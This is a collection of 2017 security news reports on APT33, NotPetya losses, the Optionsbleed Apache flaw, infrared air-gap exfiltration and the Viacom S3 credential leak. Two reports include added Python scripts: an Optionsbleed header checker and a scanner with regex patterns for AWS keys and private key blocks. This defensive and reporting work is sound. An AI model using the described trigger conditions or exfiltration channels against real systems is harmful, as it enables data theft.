APT33: Researchers Expose Iranian Hacking Group Linked to Destructive Malware
21.9.2017 thehackernews APT

Security researchers have recently uncovered a cyber espionage group targeting aerospace, defence and energy organisations in the United States, Saudi Arabia and South Korea.
According to the latest research published Wednesday by US security firm FireEye, an Iranian hacking group that it calls Advanced Persistent Threat 33 (or APT33) has been targeting critical infrastructure, energy and military sectors since at least 2013 as part of a massive cyber-espionage operation to gather intelligence and steal trade secrets.
The security firm also says it has evidence that APT33 works on behalf of Iran's government.
FireEye researchers have been tracking cyber attacks carried out by APT33 since at least May 2016 and found that the group has successfully targeted the aviation sector, both military and commercial, as well as organisations in the energy sector with links to petrochemical production.
The APT33 victims include a U.S. firm in the aerospace sector, a Saudi Arabian business conglomerate with aviation holdings, and a South Korean company involved in oil refining and petrochemicals.
Most recently, in May 2017, APT33 targeted employees of a Saudi organisation and a South Korean business conglomerate using a malicious file that attempted to entice them with job vacancies for a Saudi Arabian petrochemical company.
"We believe the targeting of the Saudi organisation may have been an attempt to gain insight into regional rivals, while the targeting of South Korean companies may be due to South Korea’s recent partnerships with Iran’s petrochemical industry as well as South Korea’s relationships with Saudi petrochemical companies," the FireEye report reads.
APT33 targets organisations by sending spear phishing emails with malicious HTML links to infect targets' computers with malware. The malware used by the espionage group includes DROPSHOT (dropper), SHAPESHIFT (wiper) and TURNEDUP (custom backdoor, which is the final payload).
However, in previous research published by Kaspersky, DROPSHOT was tracked by its researchers as StoneDrill, which targeted a petroleum company in Europe and is believed to be an updated version of the Shamoon 2 malware.
"Although we have only directly observed APT33 use DROPSHOT to deliver the TURNEDUP backdoor, we have identified multiple DROPSHOT samples in the wild that drop SHAPESHIFT," the report reads.
The SHAPESHIFT malware can wipe disks, erase volumes and delete files, depending on its configuration.
According to FireEye, APT33 sent hundreds of spear phishing emails last year from several domains that masqueraded as Saudi aviation companies and international organisations, including Boeing, Alsalam Aircraft Company and Northrop Grumman Aviation Arabia.
The security firm also believes APT33 is linked to the Nasr Institute, an Iranian government organisation that conducts cyber warfare operations.
In July, researchers at Trend Micro and Israeli firm ClearSky uncovered another Iranian espionage group, dubbed Rocket Kitten, that has also been active since 2013 and has targeted organisations and individuals, including diplomats and researchers, in Israel, Saudi Arabia, Turkey, the United States, Jordan and Germany.
However, the FireEye report does not show any links between the two hacking groups. For more technical details about the APT33 operations, head over to FireEye's official blog post.


FedEx Profit Takes $300 Million Hit After Malware Attack
21.9.2017 securityweek  Virus
The malware attack that hit international delivery services company TNT Express in June had a negative impact of roughly $300 million on FedEx’s profit in the latest quarter.

TNT Express, which FedEx acquired last year for $4.8 billion, was one of several major companies whose systems were infected with NotPetya malware (also known as Nyetya, PetrWrap, exPetr, GoldenEye, and Diskcoder.C) in late June.

The company reported a few weeks after the attack that the incident had a significant impact on its operations and communications. FedEx admitted at the time that it was possible TNT would not be able to fully restore all affected systems and recover all the critical business data encrypted by NotPetya.

“The worldwide operations of TNT Express were significantly affected during the first quarter by the June 27 NotPetya cyberattack. Most TNT Express services resumed during the quarter and substantially all TNT Express critical operational systems have been restored. However, TNT Express volume, revenue and profit still remain below previous levels,” the company said on Tuesday.

“Operating results declined due to an estimated $300 million impact from the cyberattack, which was partially offset by the benefits from revenue growth, lower incentive compensation accruals and ongoing cost management initiatives,” it added.

Hurricane Harvey, a category 4 hurricane that hit Texas in late August, also had a negative impact on the company’s earnings in the latest quarter.

FedEx reported earnings of $2.19 per diluted share compared to $2.65 per diluted share one year ago. The company reported a revenue of $15.3 billion and reaffirmed its commitment to improve the operating income of its largest business, FedEx Express, by $1.2 billion to $1.5 billion by 2020 compared to fiscal 2017.

FedEx is not the only company whose bottom line was impacted by NotPetya, a piece of malware that initially appeared to be ransomware and later turned out to be a wiper.

Financial reports published in August by Danish shipping giant AP Moller-Maersk, British consumer goods company Reckitt Benckiser, voice and language solutions provider Nuance Communications, Mondelez International, and French construction giant Saint-Gobain reported losses of millions of dollars due to the cyberattack. The highest sum was announced at the time by Saint Gobain, which expected losses to rise to nearly $400 million.


Iranian cyber spies APT33 target aerospace and energy organizations
21.9.2017 securityaffairs  APT

The Iran-linked APT33 group has been targeting aerospace and energy organizations in the United States, Saudi Arabia, and South Korea.
According to security firm FireEye, a cyber espionage group linked to the Iranian Government, dubbed APT33, has been targeting aerospace and energy organizations in the United States, Saudi Arabia, and South Korea.

The APT33 group has been active since at least 2013; since mid-2016 it has targeted the aviation industry and energy companies with connections to petrochemical production.

“From mid-2016 through early 2017, APT33 compromised a U.S. organization in the aerospace sector and targeted a business conglomerate located in Saudi Arabia with aviation holdings.” reads a blog post published by FireEye.

“During the same time period, APT33 also targeted a South Korean company involved in oil refining and petrochemicals. More recently, in May 2017, APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company.”

According to the experts, the APT33 group is gathering information on Saudi Arabia’s military aviation capabilities to gain insight into rivals in the Middle East.

“We assess the targeting of multiple companies with aviation-related partnerships to Saudi Arabia indicates that APT33 may possibly be looking to gain insights on Saudi Arabia’s military aviation capabilities to enhance Iran’s domestic aviation capabilities or to support Iran’s military and strategic decision making vis a vis Saudi Arabia,” continues FireEye.

“We believe the targeting of the Saudi organization may have been an attempt to gain insight into regional rivals, while the targeting of South Korean companies may be due to South Korea’s recent partnerships with Iran’s petrochemical industry as well as South Korea’s relationships with Saudi petrochemical companies.”

The cyberspies leverage spear phishing emails sent to employees whose jobs are related to the aviation industry.

The recruitment-themed messages contained links to malicious HTML application (.hta) files. The .hta files contained job descriptions and links to legitimate job postings on popular employment websites that would be of interest to the victims.

The experts noticed APT33 used a built-in phishing module within the publicly available ALFA TEaM Shell (aka ALFASHELL) to send phishing messages to targeted individuals in 2016.

The attackers set up several domains that appeared as belonging to Saudi aviation firms and other companies that work with them, including Alsalam Aircraft Company, Boeing and Northrop Grumman Aviation Arabia.

The malware used by the APT33 group includes a dropper dubbed DROPSHOT, tracked by Kaspersky as StoneDrill, that has been linked to the wiper malware SHAPESHIFT and used in targeted attacks against organizations in Saudi Arabia. The arsenal of the group also includes a backdoor called TURNEDUP.

Kaspersky experts linked the StoneDrill malware to the Shamoon 2 and Charming Kitten (aka Newscaster and NewsBeef), a threat actor believed to be operating out of Iran.

The researchers identified an actor using the handle “xman_1365_x” that has been involved in the development and use of the TURNEDUP backdoor.

“Xman_1365_x was also a community manager in the Barnamenevis Iranian programming and software engineering forum, and registered accounts in the well-known Iranian Shabgard and Ashiyane forums, though we did not find evidence to suggest that this actor was ever a formal member of the Shabgard or Ashiyane hacktivist groups.” continues FireEye.

FireEye cited open source reporting that links the “xman_1365_x” actor to the “Nasr Institute,” which is described as the equivalent of Iran’s “cyber army” and directly controlled by the Iranian government.


Optionsbleed vulnerability can cause Apache servers to leak memory data
21.9.2017 securityaffairs  Hacking

Optionsbleed is a vulnerability in Apache HTTP Server that can cause certain systems to leak potentially sensitive data in response to HTTP OPTIONS requests.
The freelance journalist and security researcher Hanno Böck discovered a vulnerability, dubbed ‘Optionsbleed’, in Apache HTTP Server (httpd) that can cause certain systems to leak potentially sensitive data in response to HTTP OPTIONS requests.

Böck was analyzing HTTP methods when he noticed that requests using the OPTIONS method, which a client normally uses to ask a server which HTTP methods it supports, were sometimes answered with apparently corrupted data in the “Allow” header instead of the expected list of methods (e.g. “Allow: GET, POST, OPTIONS, HEAD”). Below are examples of the responses obtained by Böck:

Allow: POST,OPTIONS,,HEAD,:09:44 GMT
Allow: GET,HEAD,OPTIONS,,HEAD,,HEAD,,HEAD,, HEAD,,HEAD,,HEAD,,HEAD,POST,,HEAD,, HEAD,!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
Allow: GET,HEAD,OPTIONS,=write HTTP/1.0,HEAD,,HEAD,POST,,HEAD,TRACE

The stray data is server memory leaked by Apache due to a use-after-free bug tracked as CVE-2017-9798.

Compared with other memory-“bleeding” flaws such as Heartbleed, the Optionsbleed vulnerability is less severe: to be exploited, the targeted system needs to be configured in a certain way, and even then the response does not always contain other data.

Security firm Sophos published a detailed analysis of the vulnerability.

The expert tested the Alexa Top 1 Million websites for the Optionsbleed flaw and received corrupted Allow headers from only 466 of them.

With the support of the Apache developer Jacob Champion, Böck verified that the Optionsbleed vulnerability only affects specific configurations. Böck has released a proof-of-concept (PoC) script for Optionsbleed.
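
The check behind Böck’s survey, written here as an added example (it is neither his PoC nor Apache code): parse the Allow header of an OPTIONS response and flag list elements that cannot be HTTP method tokens. The sample headers are the ones quoted above plus a constructed healthy one; the list of common methods is this example’s own assumption.

```python
import re
from typing import Dict, List, Tuple

# RFC 7230 "token" grammar (one or more tchar). A healthy Allow header is a
# comma-separated list of such tokens, one per supported method.
_TOKEN_RE = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")

# Methods httpd commonly advertises. A valid token outside this set (e.g. a
# WebDAV method) is only reported as unfamiliar, not as corruption. This set
# is an assumption of the example, not taken from the Apache source.
COMMON_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "CONNECT",
                  "OPTIONS", "TRACE", "PATCH"}


def check_allow_value(value: str) -> Tuple[str, List[str]]:
    """Classify one Allow header value.

    Returns ("clean" | "unfamiliar" | "corrupt", problems). Empty list
    elements (the doubled commas in the leaked headers) and elements that are
    not HTTP tokens (spaces, quotes, colons, slashes) cannot come from a
    healthy method list and are treated as evidence of leaked memory.
    """
    problems: List[str] = []
    verdict = "clean"
    for element in value.split(","):
        element = element.strip(" \t")
        if element == "":
            problems.append("empty list element")
            verdict = "corrupt"
        elif not _TOKEN_RE.match(element):
            problems.append(f"not an HTTP token: {element!r}")
            verdict = "corrupt"
        elif element.upper() not in COMMON_METHODS:
            problems.append(f"unfamiliar method: {element!r}")
            if verdict == "clean":
                verdict = "unfamiliar"
    return verdict, problems


def audit_response_headers(raw_headers: str) -> Dict[str, Tuple[str, List[str]]]:
    """Audit every Allow header in a raw header block (status line optional).

    Keys are the header values as received; values come from check_allow_value.
    Lines that are not 'Allow:' headers (including the HTML continuation line
    in the third leaked sample) are ignored.
    """
    results: Dict[str, Tuple[str, List[str]]] = {}
    for line in raw_headers.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "allow":
            value = value.strip()
            results[value] = check_allow_value(value)
    return results


# Constructed sample: one healthy reply followed by the three corrupted
# headers quoted in the article, pasted verbatim.
SAMPLE_HEADERS = """\
HTTP/1.1 200 OK
Allow: GET, POST, OPTIONS, HEAD
Allow: POST,OPTIONS,,HEAD,:09:44 GMT
Allow: GET,HEAD,OPTIONS,,HEAD,,HEAD,,HEAD,, HEAD,,HEAD,,HEAD,,HEAD,POST,,HEAD,, HEAD,!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
Allow: GET,HEAD,OPTIONS,=write HTTP/1.0,HEAD,,HEAD,POST,,HEAD,TRACE
"""

if __name__ == "__main__":
    for value, (verdict, problems) in audit_response_headers(SAMPLE_HEADERS).items():
        print(f"{verdict:10} Allow: {value}")
        for problem in problems:
            print(f"           - {problem}")
```

Run against your own servers, the same check over a live OPTIONS reply tells you whether a `Limit` misconfiguration is leaking memory before a tenant or a scanner notices.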

“Apache supports a configuration directive Limit that allows restricting access to certain HTTP methods to a specific user. And if one sets the Limit directive in an .htaccess file for an HTTP method that’s not globally registered in the server then the corruption happens. After that I was able to reproduce it myself. Setting a Limit directive for any invalid HTTP method in an .htaccess file caused a use after free error in the construction of the Allow header which was also detectable with Address Sanitizer. (However ASAN doesn’t work reliably due to the memory allocation abstraction done by APR.)” explained the researcher.

The researcher highlighted potential risks for shared hosting environments.

“The corruption is not limited to a single virtual host. One customer of a shared hosting provider could deliberately create an .htaccess file causing this corruption hoping to be able to extract secret data from other hosts on the same system,” Böck added.

The problem is not new: it was analyzed in a paper titled “Support for Various HTTP Methods on the Web” published back in May 2014, just a few weeks after the disclosure of the Heartbleed vulnerability.

The bad news for Apache users is that the maintainers of the project could not provide an estimated date for the fix; for this reason, Böck decided to share his findings.

Development teams behind Linux distributions have also started releasing fixes for the Optionsbleed flaw.


FedEx announces $300m in lost business and response costs after NotPetya attack
21.9.2017 securityaffairs  Ransomware

FedEx is the latest firm to disclose the cost of the massive NotPetya attack: roughly $300m in lost business and response costs.
The malware compromised systems worldwide, most of them in Ukraine; the list of victims is long and includes the US pharmaceutical company Merck, the shipping giant Maersk, Ukraine’s central bank, Russian oil giant Rosneft, advertising group WPP, TNT Express and the law firm DLA Piper.

According to the second quarter earnings report published by Maersk, the company expected losses of between $200 million and $300 million due to “significant business interruption”, because it was forced to temporarily halt critical systems infected with the ransomware.

The situation announced by FedEx is also disconcerting: its systems will only be fully restored at the end of September, three months after the incident.

“The worldwide operations of TNT Express were significantly affected during the first quarter by the June 27 NotPetya cyberattack. Most TNT Express services resumed during the quarter and substantially all TNT Express critical operational systems have been restored. However, TNT Express volume, revenue and profit still remain below previous levels,” the company said on Tuesday.

“Operating results declined due to an estimated $300 million impact from the cyberattack, which was partially offset by the benefits from revenue growth, lower incentive compensation accruals and ongoing cost management initiatives.”

During a conference call with financial analysts on Tuesday, FedEx chief information officer Rob Carter confirmed that the attack vector was an infected tax software update delivered to its systems in Ukraine, a clear reference to the MeDoc accounting application.

Carter confirmed that the malware used in the attack was extremely disruptive, but also confirmed that customer data were not exposed.

“This attack was the result of [a] nation state targeting Ukraine and companies that do business there,” he explained.

TNT is adopting further measures to protect its infrastructure, especially legacy systems in hubs and depots worldwide.

Other companies are counting the huge cost of the attack: the consumer goods firm Reckitt Benckiser announced the attack cost it £100m ($136m), but the highest cost was announced by Saint Gobain, which expected $400 million in losses.


Iranian Hackers Target Aerospace, Energy Companies
20.9.2017 securityweek BigBrothers
A cyber espionage group linked by security researchers to the Iranian government has been observed targeting aerospace and energy organizations in the United States, Saudi Arabia and South Korea.

The threat actor, tracked by FireEye as APT33, is believed to have been around since at least 2013. Since mid-2016, the security firm has spotted attacks aimed by this group at the aviation sector, including military and commercial aviation, and energy companies with connections to petrochemical production.

Specifically, the cyberspies targeted a U.S. organization in the aerospace sector, a Saudi Arabian business conglomerate with aviation holdings, and a South Korean firm involved in oil refining and petrochemicals. In recent attacks, the hackers used job vacancies at a Saudi Arabian petrochemical firm to target the employees of organizations in South Korea and Saudi Arabia.

“We assess the targeting of multiple companies with aviation-related partnerships to Saudi Arabia indicates that APT33 may possibly be looking to gain insights on Saudi Arabia’s military aviation capabilities to enhance Iran’s domestic aviation capabilities or to support Iran’s military and strategic decision making vis a vis Saudi Arabia,” FireEye said in a blog post.

“We believe the targeting of the Saudi organization may have been an attempt to gain insight into regional rivals, while the targeting of South Korean companies may be due to South Korea’s recent partnerships with Iran’s petrochemical industry as well as South Korea’s relationships with Saudi petrochemical companies,” the company added.

According to FireEye, the cyber espionage group sent hundreds of spear phishing emails last year. They set up several domains made to look as if they belonged to Saudi aviation firms and international organizations that work with them, including Alsalam Aircraft Company, Boeing and Northrop Grumman Aviation Arabia.

The malware used by the group includes a dropper tracked by FireEye as DROPSHOT, a wiper named SHAPESHIFT, and a backdoor called TURNEDUP. DROPSHOT was previously analyzed by Kaspersky, which tracks it as StoneDrill.

The StoneDrill malware was tied by Kaspersky to the notorious Shamoon 2 and Charming Kitten (aka Newscaster and NewsBeef), a threat actor believed to be operating out of Iran.

FireEye has also linked APT33 to Iran based on connections to the “Nasr Institute,” which is said to be Iran’s “cyber army”, attacks launched during Iranian working hours, and the use of Iranian hacking tools.

Iran appears to have several cyber espionage groups, including Rocket Kitten, Cobalt Gypsy (Magic Hound), Charming Kitten and CopyKittens.


Intrusion Detection Startup Threat Stack Raises $45 Million
20.9.2017 securityweek IT
Threat Stack, a Boston, Mass.-based intrusion detection startup has raised $45 million in a Series C funding, bringing the total raised by the company to more than $70 million.

The cybersecurity startup offers an integrated suite of detection and assessment tools that help customers with security and compliance by combining continuous security monitoring and risk assessment across a wide range of detection points in customers’ infrastructure.

Threat Stack explains that its platform offers a single place to monitor cloud, hybrid cloud, multi-cloud, and containerized environments, and can automatically correlate events together to identify suspicious activity.

The company claims 235% year-over-year revenue growth and an 84% increase in employee headcount as of July, with plans to grow its employee base by another 30% by the end of this year and to double the size of its downtown Boston headquarters.

“Every company is looking to get their arms around the security of their infrastructure. Most are dealing with a shortage of security talent and increasingly automated development processes - so there is a unique need for deploying security at speed and scale,” Brian M. Ahern, Threat Stack Chairman and CEO, said in a statement. “Threat Stack has built a platform for both security and operations teams to do just that. The market opportunity ahead is enormous.”

The funding round was led by F-Prime Capital Partners, the venture capital group of Fidelity Investments, and Eight Roads Ventures. Existing investors Scale Venture Partners, .406 Ventures, and Accomplice also participated in the round.

As part of the funding, Gaurav Tuli of F-Prime will join Threat Stack’s Board of Directors and Davor Hebel of Eight Roads Ventures will be an observer.

“The migration of computing workloads to public cloud environments represents the most significant shift in enterprise technology of the last 15 years. Cybersecurity continues to be the most acute challenge in the move to cloud, as cloud infrastructure is elastic and complex and attackers are operating at unprecedented speed and sophistication,” said Tuli. “Cloud security requires new approaches and new solutions, and Threat Stack is a rare security company that is purpose-built to address these unique challenges. Our investment will help drive continued innovation to meet the rapidly expanding market demand.”


Infrared Cameras Allow Hackers to Jump Air Gaps
20.9.2017 securityweek Hacking
A team of researchers from Israel has developed a piece of malware that demonstrates how hackers can abuse security cameras with infrared (IR) capabilities to send and receive data to and from an air-gapped network.

The research was conducted by the Ben-Gurion University of the Negev and the Shamoon College of Engineering in Israel. Its goal was to show that a piece of malware installed in an air-gapped network can not only exfiltrate sensitive data, such as passwords, PINs and encryption keys, but also receive commands from the outside world via infrared light, which is invisible to the human eye.

Security cameras are typically equipped with IR LEDs that provide night vision capabilities. If an attacker can plant a piece of malware on the network connected to these cameras, the malware can take control of the IR LEDs and use them to transmit bits of data.

The malware described by experts, dubbed “aIR-Jumper,” can encode the stolen data using various methods. For example, if on-off keying (OOK) encoding is used, the absence of an IR signal for a certain duration encodes a zero (“0”) bit, while the presence of a signal for the same duration encodes a one (“1”) bit.

Encoding one character of a password, PIN or encryption key requires 8 bits (1 byte). However, for data transmission purposes, the researchers suggested also adding preamble bits for calibrating certain parameters (e.g. LED location and IR levels) and synchronization with the beginning of the transmission, and some bits for error detection.

Another encoding method suggested by the researchers involves frequency changes. For example, a “1” is encoded if the LED is on for a certain duration at a certain frequency, and a zero is encoded if it’s on at a different frequency. Similarly, intensity level changes, or amplitude shift keying (ASK), can be used.

Data transmission rates depend on the security camera and the camera used to capture the data (e.g. GoPro, smartphone camera). Experiments conducted by the researchers showed that data can be exfiltrated at a rate of 20 bits/sec over a distance of tens of meters, and it can be infiltrated over a distance of hundreds of meters and even kilometers at a rate of 100 bits/sec.

Data transmission rates can be increased significantly if more than one security camera is used by the attacker. Videos have been published to show how the infiltration and exfiltration attacks work.


AWS Bucket Leaks Viacom Critical Data
20.9.2017 securityweek Cyber
An Amazon Web Services S3 cloud storage bucket containing a great deal of Viacom internal access credentials and other critical data was left publicly accessible, UpGuard security researchers have discovered.

Viacom is an $18 billion multinational corporation that owns Paramount Pictures and various cable channels, including MTV, BET, Comedy Central, and Nickelodeon. According to the company, it has “the largest portfolio of ad-supported cable networks in the United States, in terms of audience share.”

Chris Vickery, UpGuard Director of Cyber Risk Research, was the one to discover the exposed Amazon Web Services (AWS) bucket. In it, he found seventy-two .tgz files representing irregular backups of technical data, created starting with June 2017 and containing a host of sensitive data.

The backups, which the security researcher determined to be incremental, were located at the subdomain “mcs-puppet.” MCS likely refers to Multiplatform Compute Services, the group that supports the infrastructure for hundreds of Viacom’s online properties, including MTV, Nickelodeon, Comedy Central, Paramount, and BET.

MCS appears to be currently in the process of migrating its infrastructure to AWS and getting ready to launch production workloads on containers (Amazon ECS), which explains the presence of said backup data on AWS.

After having a look at the exposed data, the security researcher determined that it included a master provisioning server running Puppet, left accessible to the public Internet, along with “the credentials needed to build and maintain Viacom servers across the media empire’s many subsidiaries and dozens of brands,” UpGuard’s Dan O'Sullivan notes in a blog post.

Viacom’s secret cloud keys were also exposed in the leak, which could have put the media company’s cloud-based servers in the hands of hackers. Thus, attackers could have been able to launch a variety of attacks while leveraging “the IT infrastructure of one of the world’s largest broadcast and media companies.”

UpGuard also explains that in addition to the passwords and manifests for Viacom’s servers, the access key and secret key for the corporation’s AWS account were also stored in the repository. Thus, an attacker accessing the bucket could have compromised Viacom’s servers, storage, and databases under the AWS account, leveraging the leaked data for phishing schemes or abusing Viacom’s IT systems for a botnet.

“Analysis reveals that a number of cloud instances used within Viacom’s IT toolchain, including Docker, New Relic, Splunk, and Jenkins, could’ve thus been compromised in this manner,” O'Sullivan says.

When decompressed, each of the seventy-two .tgz files in the bucket revealed a number of folders, such as “manifests,” “configs,” “keys,” and “modules,” along with various files that indicated the use of server provisioning and automation suite Puppet, which is frequently used by IT admins for configuration management.

The suite allows enterprises to easily create new servers and streamline operations at scale, and an admin using it would need to know all of the relevant credentials to have access to all required systems, and this type of access was leaked via said repository.

“Picture a skeleton key, opening not merely every door in a house, but every door that could be added to the house as well. This is the type of master access that was publicly exposed in the S3 bucket,” O'Sullivan explains.

Other data in the bucket included GPG decryption keys, as Viacom utilizes GPG encryption on many regular backups, thus allowing an attacker to decrypt data. Ruby scripts were also exposed in the leak, allowing malicious actors to know what applications are being run.
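
The kind of pre-publication check that would have caught this, as an added example that is not UpGuard’s or Viacom’s code: unpack each backup archive in memory and scan its files for the material the article describes (AWS access keys, secret keys in Puppet manifests, PGP private key blocks). The AWS access key ID shape follows AWS’s public documentation; the other heuristics, the folder layout and every sample value are constructed for this example.

```python
import io
import re
import tarfile
from typing import Dict, List

# What to look for. The AWS access key ID shape (AKIA/ASIA followed by 16
# upper-case alphanumerics) follows AWS's public documentation; the secret-key
# heuristic and the key-block markers are this example's own choices.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "aws_secret_access_key": re.compile(
        r"(?i)aws_secret_access_key\W{0,10}([A-Za-z0-9/+=]{40})(?![A-Za-z0-9/+=])"),
    "pgp_private_key": re.compile(r"-----BEGIN PGP PRIVATE KEY BLOCK-----"),
    "ssh_private_key": re.compile(
        r"-----BEGIN (?:RSA |OPENSSH |EC |DSA )?PRIVATE KEY-----"),
}


def scan_text(path: str, text: str) -> List[Dict[str, object]]:
    """Return one finding per (line, pattern) hit. Only the location and the
    kind are recorded, never the matched value, so the report can be shared."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, pattern in PATTERNS.items():
            if pattern.search(line):
                findings.append({"path": path, "line": lineno, "kind": kind})
    return findings


def scan_tarball(tgz_bytes: bytes, max_member_bytes: int = 1_000_000) -> List[Dict[str, object]]:
    """Walk a gzip-compressed tar archive in memory and scan every regular file.
    Oversized members are skipped so a stray disk image cannot stall the scan."""
    findings: List[Dict[str, object]] = []
    with tarfile.open(fileobj=io.BytesIO(tgz_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile() or member.size > max_member_bytes:
                continue
            handle = tar.extractfile(member)
            if handle is None:
                continue
            text = handle.read().decode("utf-8", errors="replace")
            findings.extend(scan_text(member.name, text))
    return findings


# Constructed sample backup in the shape the article describes (manifests/,
# configs/, keys/ under an MCS folder). Every credential below is a fake of
# the right length and alphabet, not real key material.
SAMPLE_FILES = {
    "mcs/manifests/aws.pp": (
        "# constructed sample Puppet manifest\n"
        "class mcs::aws {\n"
        "  $aws_access_key_id     = 'AKIAEXAMPLEEXAMPLE01'\n"
        "  $aws_secret_access_key = 'CONSTRUCTEDsecretCONSTRUCTEDsecretABCD01'\n"
        "}\n"
    ),
    "mcs/configs/site.pp": "node default {\n  include mcs::base\n}\n",
    "mcs/keys/backup-signing.asc": (
        "-----BEGIN PGP PRIVATE KEY BLOCK-----\n"
        "constructed placeholder, not a real key\n"
        "-----END PGP PRIVATE KEY BLOCK-----\n"
    ),
}


def build_sample_backup() -> bytes:
    """Pack SAMPLE_FILES into an in-memory .tgz so the scan runs offline."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, content in SAMPLE_FILES.items():
            data = content.encode("utf-8")
            info = tarfile.TarInfo(name=path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_tarball(build_sample_backup()):
        print(f"{finding['path']}:{finding['line']}: {finding['kind']}")
```

Any non-empty finding list is a reason to stop the upload; the same scan over real archives before they reach object storage turns the leak described here into a pipeline failure instead of a public exposure.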

UpGuard discovered the exposed bucket on August 30 and alerted Viacom the next day. The multinational corporation closed the gap within hours.

“This incident highlights the potentially enormous cost such data leaks can evince upon even the largest and most sophisticated organizations. Exposed in this incident were nothing less than the master controls needed to harness the power of a digital media empire and turn it towards nefarious aims,” O'Sullivan points out.

We’ve contacted Viacom for a comment on this and will update the article as soon as a response arrives.


Viacom left the keys of its digital kingdom on a publicly exposed AWS S3 bucket
20.9.2017 securityaffairs Cyber

The security researcher Chris Vickery discovered that media giant Viacom left sensitive data and a secret access key in an unsecured Amazon AWS S3 bucket.
Media giant Viacom left sensitive data and a secret access key in an unsecured Amazon AWS S3 bucket, a gift for hackers. Viacom controls Paramount Pictures, MTV, Comedy Central and Nickelodeon.

The huge data store was discovered by the popular security researcher Chris Vickery, director of Cyber Risk Research at security firm UpGuard.

The Amazon AWS S3 bucket contained 72 compressed .tgz files in a folder labeled ‘MCS’, a name which appears to refer to Viacom’s Multiplatform Compute Services division that operates IT systems for the firm.

The cloud storage exposed a gigabyte’s worth of credentials and configuration files for the backend of dozens of Viacom properties.

“While Viacom has not confirmed to UpGuard the purpose of this bucket, the contents of the repository appear to be nothing less than either the primary or backup configuration of Viacom’s IT infrastructure. The presence of this data in an S3 bucket bearing MCS’s name appears to further corroborate the Viacom group’s mission of moving its infrastructure onto Amazon Web Services’ cloud,” states Vickery.

The Amazon AWS S3 contained the passwords and manifests for Viacom’s servers, as well as the access key and private key for the corporation’s AWS account. Some of the data was encrypted using GPG, but the disconcerting news is that the bucket also contained the related decryption keys.

“While the exposure has since been closed, following UpGuard’s notification to Viacom, this incident highlights the potentially enormous cost such data leaks can evince upon even the largest and most sophisticated organizations. Exposed in this incident were nothing less than the master controls needed to harness the power of a digital media empire and turn it towards nefarious aims.” added Vickery.

“The leaked Viacom data is remarkably potent and of great significance, an important reminder that cloud leaks need not be large in disk size to be devastating; when it comes to data exposures, quality can be as vital as quantity.”

Vickery was disconcerted by his discovery and highlighted the risks faced by the organization.

“Perhaps most damaging among the exposed data are Viacom’s secret cloud keys, an exposure that, in the most damaging circumstances, could put the international media conglomerate’s cloud-based servers in the hands of hackers,” says Vickery.

“Analysis of the Viacom leak reveals nothing less than this: the keys to a media kingdom were left publicly accessible on the internet, completely compromising the integrity of Viacom’s digital infrastructure.”

Viacom sent the following statement to Vickery:

“Once Viacom became aware that information on a server – including technical information, but no employee or customer information – was publicly accessible, we rectified the issue. We have analyzed the data in question and determined there was no material impact.”

The Viacom case is just the latest in a series of Amazon S3 buckets found unsecured online.

Earlier in September, researchers from cybersecurity company UpGuard discovered thousands of files containing personal data on former US military, intelligence, and government workers that had allegedly been exposed online for months.

In August, Vickery discovered more than 1.8 million voter records belonging to Americans that had been accidentally leaked online by a US voting machine supplier serving dozens of US states.

In June, Vickery discovered that a top defense contractor had left tens of thousands of sensitive Pentagon documents on an Amazon server without any protection in place.

Chris Vickery has uncovered many other notable cases of databases exposed on the Internet. In July, he discovered data belonging to 14 million U.S.-based Verizon customers exposed on an unprotected AWS server by a partner of the telecommunications company. In December 2015 he discovered 191 million records belonging to US voters online, and in April 2016 he also discovered a 132 GB MongoDB database open online and containing 93.4 million Mexican voter records.

In March 2016, Chris Vickery discovered online the database of the Kinoptic iOS app, which had been abandoned by its developers, containing details of over 198,000 users.

In January 2017, the expert discovered online an open Rsync server hosting the personal details of at least 200,000 IndyCar racing fans.

In March, he announced a data leak of 1.37 billion records, and in June 2017 Vickery revealed that the firm DRA had left 1.1 TB of data unsecured on an Amazon S3 bucket, exposing 198 million US voter records.


iOS 11 Patches 8 Security Vulnerabilities
20.9.2017 securityweek iOS

Apple this week announced the availability of 8 security patches for iPhone 5s and later, iPad Air and later, and iPod touch 6th generation, released as part of the iOS 11 platform upgrade.

The bugs affect 7 platform components, namely Exchange ActiveSync, iBooks, Mail MessageUI, Messages, MobileBackup, Safari, and WebKit. Exploitation of these issues could lead to data deletion, denial of service, address bar spoofing, or the creation of unencrypted backups.

By requiring TLS, Apple resolved a validation issue (CVE-2017-7088) in Exchange ActiveSync that could allow an attacker in a privileged network position to erase a device during Exchange account setup.

The company also patched denial of service issues in iBooks (CVE-2017-7072), Mail MessageUI (CVE-2017-7097), and Messages (CVE-2017-7118), which could be exploited by an attacker through supplying a maliciously crafted iBooks file or a maliciously crafted image. Improved memory handling and improved validation resolved the bugs, Apple says.

A permissions issue (CVE-2017-7133) in MobileBackup that could result in the creation of an unencrypted backup despite a requirement to perform only encrypted backups was resolved with improved permission validation.

A vulnerability (CVE-2017-7085) in Safari that Apple refers to as an “inconsistent user interface issue” could result in address bar spoofing when visiting a malicious website and was addressed with improved state management.

The tech giant also patched two flaws in WebKit. Tracked as CVE-2017-7106, the first of them could result in address bar spoofing when visiting a malicious website. The second is tracked as CVE-2017-7089 and could lead to universal cross-site scripting when processing maliciously crafted web content. Apple addressed both with improved state management.

The three vulnerabilities in Safari and WebKit were found to affect OS X and macOS users as well, and Apple released Safari 11 to address them. The update applies to OS X El Capitan 10.11.6 and macOS Sierra 10.12.6 systems, the company says.
